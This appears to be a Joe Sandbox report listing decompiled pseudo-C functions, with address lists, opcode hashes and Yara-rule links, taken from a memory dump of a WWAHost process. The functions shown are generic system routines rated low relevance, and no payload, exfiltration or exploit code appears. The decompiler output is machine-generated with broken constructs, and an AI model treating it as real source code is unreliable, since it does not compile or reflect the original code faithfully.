                                              • Opcode ID: 7af18430bb7bb7cfdb4b06a47b2619d0625acf7d1ba31dcc47b7ce5ad7faea68
                                              • Instruction ID: 50f611e26908360a76bfaf9b5b7555fd660a53bd6cbff8b8604a01d84ddc0211
                                              • Opcode Fuzzy Hash: 7af18430bb7bb7cfdb4b06a47b2619d0625acf7d1ba31dcc47b7ce5ad7faea68
                                              • Instruction Fuzzy Hash: CB318F35201B04CFDB21DF28C940B96B3E9FF88764F18456DE49687B90EB35A801CB50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 039D6C0A Relevance: .1, Instructions: 79COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 77%
                                              			E039D6C0A(signed short* __ecx, signed char __edx, signed char _a4, signed char _a8) {
				signed short* _v8;
				signed char _v12;
				void* _t22;
				signed char* _t23;
				intOrPtr _t24;
				signed short* _t44;
				void* _t47;
				signed char* _t56;
				signed char* _t58;

				_t48 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t44 = __ecx;
				_v12 = __edx;
				_v8 = __ecx;
				_t22 = E03977D50();
				_t58 = 0x7ffe0384;
				if(_t22 == 0) {
					_t23 = 0x7ffe0384;
				} else {
					_t23 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				}
				if( *_t23 != 0) {
					_t24 =  *0x3a47b9c; // 0x0
					_t47 = ( *_t44 & 0x0000ffff) + 0x30;
					_t23 = L03974620(_t48,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t24 + 0x180000, _t47);
					_t56 = _t23;
					if(_t56 != 0) {
						_t56[0x24] = _a4;
						_t56[0x28] = _a8;
						_t56[6] = 0x1420;
						_t56[0x20] = _v12;
						_t14 =  &(_t56[0x2c]); // 0x2c
						E0399F3E0(_t14, _v8[2],  *_v8 & 0x0000ffff);
						_t56[0x2c + (( *_v8 & 0x0000ffff) >> 1) * 2] = 0;
						if(E03977D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						}
						_push(_t56);
						_push(_t47 - 0x20);
						_push(0x402);
						_push( *_t58 & 0x000000ff);
						E03999AE0();
						_t23 = L039777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t56);
					}
				}
				return _t23;
			}












                                              0x039d6c0a
                                              0x039d6c0f
                                              0x039d6c10
                                              0x039d6c13
                                              0x039d6c15
                                              0x039d6c19
                                              0x039d6c1c
                                              0x039d6c21
                                              0x039d6c28
                                              0x039d6c3a
                                              0x039d6c2a
                                              0x039d6c33
                                              0x039d6c33
                                              0x039d6c3f
                                              0x039d6c48
                                              0x039d6c4d
                                              0x039d6c60
                                              0x039d6c65
                                              0x039d6c69
                                              0x039d6c73
                                              0x039d6c79
                                              0x039d6c7f
                                              0x039d6c86
                                              0x039d6c90
                                              0x039d6c94
                                              0x039d6ca6
                                              0x039d6cb2
                                              0x039d6cbd
                                              0x039d6cbd
                                              0x039d6cc3
                                              0x039d6cc7
                                              0x039d6ccb
                                              0x039d6cd0
                                              0x039d6cd1
                                              0x039d6ce2
                                              0x039d6ce2
                                              0x039d6c69
                                              0x039d6ced

                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: bb2646db8b7cca36658d84b256d83bdb3e9a86f725759069941a49e0a1665be6
                                              • Instruction ID: c2e84a8ca4d13d76972d882952d5ca945a5d8a97381c2126aa295aeb6a509373
                                              • Opcode Fuzzy Hash: bb2646db8b7cca36658d84b256d83bdb3e9a86f725759069941a49e0a1665be6
                                              • Instruction Fuzzy Hash: 4621ABB5A00644AFD711DBA8D881F6AB7B8FF88740F04406AF905CB791E735ED11CBA4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 039990AF Relevance: .1, Instructions: 76COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 82%
                                              			E039990AF(intOrPtr __ecx, void* __edx, intOrPtr* _a4) {
				intOrPtr* _v0;
				void* _v8;
				signed int _v12;
				intOrPtr _v16;
				char _v36;
				void* _t38;
				intOrPtr _t41;
				void* _t44;
				signed int _t45;
				intOrPtr* _t49;
				signed int _t57;
				signed int _t58;
				intOrPtr* _t59;
				void* _t62;
				void* _t63;
				void* _t65;
				void* _t66;
				signed int _t69;
				intOrPtr* _t70;
				void* _t71;
				intOrPtr* _t72;
				intOrPtr* _t73;
				char _t74;

				_t65 = __edx;
				_t57 = _a4;
				_t32 = __ecx;
				_v8 = __edx;
				_t3 = _t32 + 0x14c; // 0x14c
				_t70 = _t3;
				_v16 = __ecx;
				_t72 =  *_t70;
				while(_t72 != _t70) {
					if( *((intOrPtr*)(_t72 + 0xc)) != _t57) {
						L24:
						_t72 =  *_t72;
						continue;
					}
					_t30 = _t72 + 0x10; // 0x10
					if(E039AD4F0(_t30, _t65, _t57) == _t57) {
						return 0xb7;
					}
					_t65 = _v8;
					goto L24;
				}
				_t61 = _t57;
				_push( &_v12);
				_t66 = 0x10;
				if(E0398E5E0(_t57, _t66) < 0) {
					return 0x216;
				}
				_t73 = L03974620(_t61,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v12);
				if(_t73 == 0) {
					_t38 = 0xe;
					return _t38;
				}
				_t9 = _t73 + 0x10; // 0x10
				 *((intOrPtr*)(_t73 + 0xc)) = _t57;
				E0399F3E0(_t9, _v8, _t57);
				_t41 =  *_t70;
				if( *((intOrPtr*)(_t41 + 4)) != _t70) {
					_t62 = 3;
					asm("int 0x29");
					_push(_t62);
					_push(_t57);
					_push(_t73);
					_push(_t70);
					_t71 = _t62;
					_t74 = 0;
					_v36 = 0;
					_t63 = E0398A2F0(_t62, _t71, 1, 6,  &_v36);
					if(_t63 == 0) {
						L20:
						_t44 = 0x57;
						return _t44;
					}
					_t45 = _v12;
					_t58 = 0x1c;
					if(_t45 < _t58) {
						goto L20;
					}
					_t69 = _t45 / _t58;
					if(_t69 == 0) {
						L19:
						return 0xe8;
					}
					_t59 = _v0;
					do {
						if( *((intOrPtr*)(_t63 + 0xc)) != 2) {
							goto L18;
						}
						_t49 =  *((intOrPtr*)(_t63 + 0x14)) + _t71;
						 *_t59 = _t49;
						if( *_t49 != 0x53445352) {
							goto L18;
						}
						 *_a4 =  *((intOrPtr*)(_t63 + 0x10));
						return 0;
						L18:
						_t63 = _t63 + 0x1c;
						_t74 = _t74 + 1;
					} while (_t74 < _t69);
					goto L19;
				}
				 *_t73 = _t41;
				 *((intOrPtr*)(_t73 + 4)) = _t70;
				 *((intOrPtr*)(_t41 + 4)) = _t73;
				 *_t70 = _t73;
				 *(_v16 + 0xdc) =  *(_v16 + 0xdc) | 0x00000010;
				return 0;
			}


























                                              0x039990af
                                              0x039990b8
                                              0x039990bb
                                              0x039990bf
                                              0x039990c2
                                              0x039990c2
                                              0x039990c8
                                              0x039990cb
                                              0x039990cd
                                              0x039d14d7
                                              0x039d14eb
                                              0x039d14eb
                                              0x00000000
                                              0x039d14eb
                                              0x039d14db
                                              0x039d14e6
                                              0x00000000
                                              0x039d14f2
                                              0x039d14e8
                                              0x00000000
                                              0x039d14e8
                                              0x039990d8
                                              0x039990da
                                              0x039990dd
                                              0x039990e5
                                              0x00000000
                                              0x03999139
                                              0x039990fa
                                              0x039990fe
                                              0x03999142
                                              0x00000000
                                              0x03999142
                                              0x03999104
                                              0x03999107
                                              0x0399910b
                                              0x03999110
                                              0x03999118
                                              0x03999147
                                              0x03999148
                                              0x0399914f
                                              0x03999150
                                              0x03999151
                                              0x03999152
                                              0x03999156
                                              0x0399915d
                                              0x03999160
                                              0x03999168
                                              0x0399916c
                                              0x039991bc
                                              0x039991be
                                              0x00000000
                                              0x039991be
                                              0x0399916e
                                              0x03999173
                                              0x03999176
                                              0x00000000
                                              0x00000000
                                              0x0399917c
                                              0x03999180
                                              0x039991b5
                                              0x00000000
                                              0x039991b5
                                              0x03999182
                                              0x03999185
                                              0x03999189
                                              0x00000000
                                              0x00000000
                                              0x0399918e
                                              0x03999190
                                              0x03999198
                                              0x00000000
                                              0x00000000
                                              0x039991a0
                                              0x00000000
                                              0x039991ad
                                              0x039991ad
                                              0x039991b0
                                              0x039991b1
                                              0x00000000
                                              0x03999185
                                              0x0399911a
                                              0x0399911c
                                              0x0399911f
                                              0x03999125
                                              0x03999127
                                              0x00000000

                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                              • Instruction ID: 75cfe3bea075928e54d572f2759b6dc4f5383af7f0bb24661ccbae41be049609
                                              • Opcode Fuzzy Hash: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                              • Instruction Fuzzy Hash: 6F215075A00305EFEB30DF59C845A6AF7F8EB48750F15886BE945AB250D330ED40CB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 03983B7A Relevance: .1, Instructions: 75COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 59%
                                              			E03983B7A(void* __ecx) {
				signed int _v8;
				char _v12;
				intOrPtr _v20;
				intOrPtr _t17;
				intOrPtr _t26;
				void* _t35;
				void* _t38;
				void* _t41;
				intOrPtr _t44;

				_t17 =  *0x3a484c4; // 0x0
				_v12 = 1;
				_v8 =  *0x3a484c0 * 0x4c;
				_t41 = __ecx;
				_t35 = L03974620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t17 + 0x000c0000 | 0x00000008,  *0x3a484c0 * 0x4c);
				if(_t35 == 0) {
					_t44 = 0xc0000017;
				} else {
					_push( &_v8);
					_push(_v8);
					_push(_t35);
					_push(4);
					_push( &_v12);
					_push(0x6b);
					_t44 = E0399AA90();
					_v20 = _t44;
					if(_t44 >= 0) {
						E0399FA60( *((intOrPtr*)(_t41 + 0x20)), 0,  *0x3a484c0 * 0xc);
						_t38 = _t35;
						if(_t35 < _v8 + _t35) {
							do {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t38 = _t38 +  *((intOrPtr*)(_t38 + 4));
							} while (_t38 < _v8 + _t35);
							_t44 = _v20;
						}
					}
					_t26 =  *0x3a484c4; // 0x0
					L039777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t26 + 0xc0000, _t35);
				}
				return _t44;
			}












                                              0x03983b89
                                              0x03983b96
                                              0x03983ba1
                                              0x03983bab
                                              0x03983bb5
                                              0x03983bb9
                                              0x039c6298
                                              0x03983bbf
                                              0x03983bc2
                                              0x03983bc3
                                              0x03983bc9
                                              0x03983bca
                                              0x03983bcc
                                              0x03983bcd
                                              0x03983bd4
                                              0x03983bd6
                                              0x03983bdb
                                              0x03983bea
                                              0x03983bf7
                                              0x03983bfb
                                              0x03983bff
                                              0x03983c09
                                              0x03983c0a
                                              0x03983c0b
                                              0x03983c0f
                                              0x03983c14
                                              0x03983c18
                                              0x03983c18
                                              0x03983bfb
                                              0x03983c1b
                                              0x03983c30
                                              0x03983c30
                                              0x03983c3d

                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d4c56adbecf61ee1ee3550b8fafeb2d8db8f9296e75edfc493bb4626f5c8131f
                                              • Instruction ID: 4b1f0169aa9bb8939678509198b6d57e96de71c0d860c97157f826841278ff84
                                              • Opcode Fuzzy Hash: d4c56adbecf61ee1ee3550b8fafeb2d8db8f9296e75edfc493bb4626f5c8131f
                                              • Instruction Fuzzy Hash: CD219276A00109EFDB00EF58DD81B6AB7BDFB84748F150069E905AB251D376ED02CB94
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 039D6CF0 Relevance: .1, Instructions: 74COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 80%
                                              			E039D6CF0(void* __edx, intOrPtr _a4, short _a8) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v28;
				char _v36;
				char _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char* _t21;
				void* _t24;
				void* _t36;
				void* _t38;
				void* _t46;

				_push(_t36);
				_t46 = __edx;
				_v12 = 0;
				_v8 = 0;
				_v20 = 0;
				_v16 = 0;
				if(E03977D50() == 0) {
					_t21 = 0x7ffe0384;
				} else {
					_t21 = ( *[fs:0x30])[0x50] + 0x22a;
				}
				if( *_t21 != 0) {
					_t21 =  *[fs:0x30];
					if((_t21[0x240] & 0x00000004) != 0) {
						if(E03977D50() == 0) {
							_t21 = 0x7ffe0385;
						} else {
							_t21 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t21 & 0x00000020) != 0) {
							_t56 = _t46;
							if(_t46 == 0) {
								_t46 = 0x3935c80;
							}
							_push(_t46);
							_push( &_v12);
							_t24 = E0398F6E0(_t36, 0, _t46, _t56);
							_push(_a4);
							_t38 = _t24;
							_push( &_v28);
							_t21 = E0398F6E0(_t38, 0, _t46, _t56);
							if(_t38 != 0) {
								if(_t21 != 0) {
									E039D7016(_a8, 0, 0, 0,  &_v36,  &_v28);
									L03972400( &_v52);
								}
								_t21 = L03972400( &_v28);
							}
						}
					}
				}
				return _t21;
			}



















                                              0x039d6cfb
                                              0x039d6d00
                                              0x039d6d02
                                              0x039d6d06
                                              0x039d6d0a
                                              0x039d6d0e
                                              0x039d6d19
                                              0x039d6d2b
                                              0x039d6d1b
                                              0x039d6d24
                                              0x039d6d24
                                              0x039d6d33
                                              0x039d6d39
                                              0x039d6d46
                                              0x039d6d4f
                                              0x039d6d61
                                              0x039d6d51
                                              0x039d6d5a
                                              0x039d6d5a
                                              0x039d6d69
                                              0x039d6d6b
                                              0x039d6d6d
                                              0x039d6d6f
                                              0x039d6d6f
                                              0x039d6d74
                                              0x039d6d79
                                              0x039d6d7a
                                              0x039d6d7f
                                              0x039d6d82
                                              0x039d6d88
                                              0x039d6d89
                                              0x039d6d90
                                              0x039d6d94
                                              0x039d6da7
                                              0x039d6db1
                                              0x039d6db1
                                              0x039d6dbb
                                              0x039d6dbb
                                              0x039d6d90
                                              0x039d6d69
                                              0x039d6d46
                                              0x039d6dc6

                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 03d004497b93adf4b24576e71c177f1dc9e8c0b87c815bb02198786d07689cd3
                                              • Instruction ID: 90fba4ca70656a8261fd390ef5d4d129221dba48d672a214fb381b7fe842759f
                                              • Opcode Fuzzy Hash: 03d004497b93adf4b24576e71c177f1dc9e8c0b87c815bb02198786d07689cd3
                                              • Instruction Fuzzy Hash: 1A21F2735003489BC321EF68ED45B6BB7ECEFC5680F494956F940DB290E734C908C6A2
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 03A2070D Relevance: .1, Instructions: 72COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 67%
                                              			E03A2070D(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				char _v8;
				intOrPtr _v11;
				signed int _v12;
				intOrPtr _v15;
				signed int _v16;
				intOrPtr _v28;
				void* __ebx;
				char* _t32;
				signed int* _t38;
				signed int _t60;

				_t38 = __ecx;
				_v16 = __edx;
				_t60 = E03A207DF(__ecx, __edx,  &_a4,  &_a8, 2);
				if(_t60 != 0) {
					_t7 = _t38 + 0x38; // 0x29cd5903
					_push( *_t7);
					_t9 = _t38 + 0x34; // 0x6adeeb00
					_push( *_t9);
					_v12 = _a8 << 0xc;
					_t11 = _t38 + 4; // 0x5de58b5b
					_push(0x4000);
					_v8 = (_a4 << 0xc) + (_v16 - ( *__ecx & _v16) >> 4 <<  *_t11) + ( *__ecx & _v16);
					E03A1AFDE( &_v8,  &_v12);
					E03A21293(_t38, _v28, _t60);
					if(E03977D50() == 0) {
						_t32 = 0x7ffe0380;
					} else {
						_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						_t21 = _t38 + 0x3c; // 0xc3595e5f
						E03A114FB(_t38,  *_t21, _v11, _v15, 0xd);
					}
				}
				return  ~_t60;
			}













                                              0x03a2071b
                                              0x03a20724
                                              0x03a20734
                                              0x03a20738
                                              0x03a2074b
                                              0x03a2074b
                                              0x03a20753
                                              0x03a20753
                                              0x03a20759
                                              0x03a2075d
                                              0x03a20774
                                              0x03a20779
                                              0x03a2077d
                                              0x03a20789
                                              0x03a20795
                                              0x03a207a7
                                              0x03a20797
                                              0x03a207a0
                                              0x03a207a0
                                              0x03a207af
                                              0x03a207c4
                                              0x03a207cd
                                              0x03a207cd
                                              0x03a207af
                                              0x03a207dc

                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                                              • Instruction ID: fc57af051d578e8f12f0ddef1a7441aea73723f6797c33beacc1d166dab52f11
                                              • Opcode Fuzzy Hash: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                                              • Instruction Fuzzy Hash: CF21F23A204A109FD705DF1CC880A6ABBA5EFD5750F08856EF9958F381D730D919CB91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 039D7794 Relevance: .1, Instructions: 70COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 82%
                                              			E039D7794(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, unsigned int _a8, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _t21;
				void* _t24;
				intOrPtr _t25;
				void* _t36;
				short _t39;
				signed char* _t42;
				unsigned int _t46;
				void* _t50;

				_push(__ecx);
				_push(__ecx);
				_t21 =  *0x3a47b9c; // 0x0
				_t46 = _a8;
				_v12 = __edx;
				_v8 = __ecx;
				_t4 = _t46 + 0x2e; // 0x2e
				_t36 = _t4;
				_t24 = L03974620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t21 + 0x180000, _t36);
				_t50 = _t24;
				if(_t50 != 0) {
					_t25 = _a4;
					if(_t25 == 5) {
						L3:
						_t39 = 0x14b1;
					} else {
						_t39 = 0x14b0;
						if(_t25 == 6) {
							goto L3;
						}
					}
					 *((short*)(_t50 + 6)) = _t39;
					 *((intOrPtr*)(_t50 + 0x28)) = _t25;
					_t11 = _t50 + 0x2c; // 0x2c
					 *((intOrPtr*)(_t50 + 0x20)) = _v8;
					 *((intOrPtr*)(_t50 + 0x24)) = _v12;
					E0399F3E0(_t11, _a12, _t46);
					 *((short*)(_t50 + 0x2c + (_t46 >> 1) * 2)) = 0;
					if(E03977D50() == 0) {
						_t42 = 0x7ffe0384;
					} else {
						_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t50);
					_t19 = _t36 - 0x20; // 0xe
					_push(0x403);
					_push( *_t42 & 0x000000ff);
					E03999AE0();
					_t24 = L039777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t50);
				}
				return _t24;
			}













                                              0x039d7799
                                              0x039d779a
                                              0x039d779b
                                              0x039d77a3
                                              0x039d77ab
                                              0x039d77ae
                                              0x039d77b1
                                              0x039d77b1
                                              0x039d77bf
                                              0x039d77c4
                                              0x039d77c8
                                              0x039d77ce
                                              0x039d77d4
                                              0x039d77e0
                                              0x039d77e0
                                              0x039d77d6
                                              0x039d77d6
                                              0x039d77de
                                              0x00000000
                                              0x00000000
                                              0x039d77de
                                              0x039d77e5
                                              0x039d77f0
                                              0x039d77f3
                                              0x039d77f6
                                              0x039d77fd
                                              0x039d7800
                                              0x039d780c
                                              0x039d7818
                                              0x039d782b
                                              0x039d781a
                                              0x039d7823
                                              0x039d7823
                                              0x039d7830
                                              0x039d7831
                                              0x039d7838
                                              0x039d783d
                                              0x039d783e
                                              0x039d784f
                                              0x039d784f
                                              0x039d785a

                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 5cff106598dbb0309cec434840759cdfdd7e3bcdd58446cb5a8a180442ca0d5d
                                              • Instruction ID: 05e8b86596b361e91cdaea0e50eaf1279f46592ad0021714548947692578914d
                                              • Opcode Fuzzy Hash: 5cff106598dbb0309cec434840759cdfdd7e3bcdd58446cb5a8a180442ca0d5d
                                              • Instruction Fuzzy Hash: A8219F76500644ABC725DFA9D881E6BB7ACEF88380F14456DE50ACB650D634E900CBA4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0397AE73 Relevance: .1, Instructions: 70COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 96%
                                              			E0397AE73(intOrPtr __ecx, void* __edx) {
				intOrPtr _v8;
				void* _t19;
				char* _t22;
				signed char* _t24;
				intOrPtr _t25;
				intOrPtr _t27;
				void* _t31;
				intOrPtr _t36;
				char* _t38;
				signed char* _t42;

				_push(__ecx);
				_t31 = __edx;
				_v8 = __ecx;
				_t19 = E03977D50();
				_t38 = 0x7ffe0384;
				if(_t19 != 0) {
					_t22 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t22 = 0x7ffe0384;
				}
				_t42 = 0x7ffe0385;
				if( *_t22 != 0) {
					if(E03977D50() == 0) {
						_t24 = 0x7ffe0385;
					} else {
						_t24 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t24 & 0x00000010) != 0) {
						goto L17;
					} else {
						goto L3;
					}
				} else {
					L3:
					_t27 = E03977D50();
					if(_t27 != 0) {
						_t27 =  *[fs:0x30];
						_t38 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22a;
					}
					if( *_t38 != 0) {
						_t27 =  *[fs:0x30];
						if(( *(_t27 + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						_t27 = E03977D50();
						if(_t27 != 0) {
							_t27 =  *[fs:0x30];
							_t42 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22b;
						}
						if(( *_t42 & 0x00000020) != 0) {
							L17:
							_t25 = _v8;
							_t36 = 0;
							if(_t25 != 0) {
								_t36 =  *((intOrPtr*)(_t25 + 0x18));
							}
							_t27 = E039D7794( *((intOrPtr*)(_t31 + 0x18)), _t36,  *((intOrPtr*)(_t31 + 0x94)),  *(_t31 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_t31 + 0x28)));
						}
						goto L5;
					} else {
						L5:
						return _t27;
					}
				}
			}













                                              0x0397ae78
                                              0x0397ae7c
                                              0x0397ae7e
                                              0x0397ae81
                                              0x0397ae86
                                              0x0397ae8d
                                              0x039c2691
                                              0x0397ae93
                                              0x0397ae93
                                              0x0397ae93
                                              0x0397ae98
                                              0x0397ae9d
                                              0x039c26a2
                                              0x039c26b4
                                              0x039c26a4
                                              0x039c26ad
                                              0x039c26ad
                                              0x039c26b9
                                              0x00000000
                                              0x039c26bb
                                              0x00000000
                                              0x039c26bb
                                              0x0397aea3
                                              0x0397aea3
                                              0x0397aea3
                                              0x0397aeaa
                                              0x039c26c0
                                              0x039c26c9
                                              0x039c26c9
                                              0x0397aeb3
                                              0x039c26d4
                                              0x039c26e1
                                              0x00000000
                                              0x00000000
                                              0x039c26e7
                                              0x039c26ee
                                              0x039c26f0
                                              0x039c26f9
                                              0x039c26f9
                                              0x039c2702
                                              0x039c2708
                                              0x039c2708
                                              0x039c270b
                                              0x039c270f
                                              0x039c2711
                                              0x039c2711
                                              0x039c2725
                                              0x039c2725
                                              0x00000000
                                              0x0397aeb9
                                              0x0397aeb9
                                              0x0397aebf
                                              0x0397aebf
                                              0x0397aeb3

                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                                              • Instruction ID: d446e350d8c3195f9e8993124a5b1fff190917fbfb16485e609ea2c7ebd58173
                                              • Opcode Fuzzy Hash: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                                              • Instruction Fuzzy Hash: 1021C232A216809FDB15EB69CA44B3977ECAF44280F0D08E5ED448B7D2E774DC40C6A1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0398FD9B Relevance: .1, Instructions: 69COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 93%
                                              			E0398FD9B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				intOrPtr _v8;
				void* _t19;
				intOrPtr _t29;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t37;
				intOrPtr* _t40;

				_t35 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t37 = 0;
				_v8 = __edx;
				_t29 = __ecx;
				if( *((intOrPtr*)( *[fs:0x18] + 0xfbc)) != 0) {
					_t40 =  *((intOrPtr*)( *[fs:0x18] + 0xfbc));
					L3:
					_t19 = _a4 - 4;
					if(_t19 != 0) {
						if(_t19 != 1) {
							L7:
							return _t37;
						}
						if(_t35 == 0) {
							L11:
							_t37 = 0xc000000d;
							goto L7;
						}
						if( *((intOrPtr*)(_t40 + 4)) != _t37) {
							L039777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37,  *((intOrPtr*)(_t40 + 4)));
							_t35 = _v8;
						}
						 *((intOrPtr*)(_t40 + 4)) = _t35;
						goto L7;
					}
					if(_t29 == 0) {
						goto L11;
					}
					_t32 =  *_t40;
					if(_t32 != 0) {
						 *((intOrPtr*)(_t29 + 0x20)) =  *((intOrPtr*)(_t32 + 0x20));
						E039676E2( *_t40);
					}
					 *_t40 = _t29;
					goto L7;
				}
				_t40 = L03974620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 8);
				if(_t40 == 0) {
					_t37 = 0xc0000017;
					goto L7;
				}
				_t35 = _v8;
				 *_t40 = 0;
				 *((intOrPtr*)(_t40 + 4)) = 0;
				 *((intOrPtr*)( *[fs:0x18] + 0xfbc)) = _t40;
				goto L3;
			}










                                              0x0398fd9b
                                              0x0398fda0
                                              0x0398fda1
                                              0x0398fdab
                                              0x0398fdad
                                              0x0398fdb0
                                              0x0398fdb8
                                              0x0398fe0f
                                              0x0398fde6
                                              0x0398fde9
                                              0x0398fdec
                                              0x039cc0c0
                                              0x0398fdfe
                                              0x0398fe06
                                              0x0398fe06
                                              0x039cc0c8
                                              0x0398fe2d
                                              0x0398fe2d
                                              0x00000000
                                              0x0398fe2d
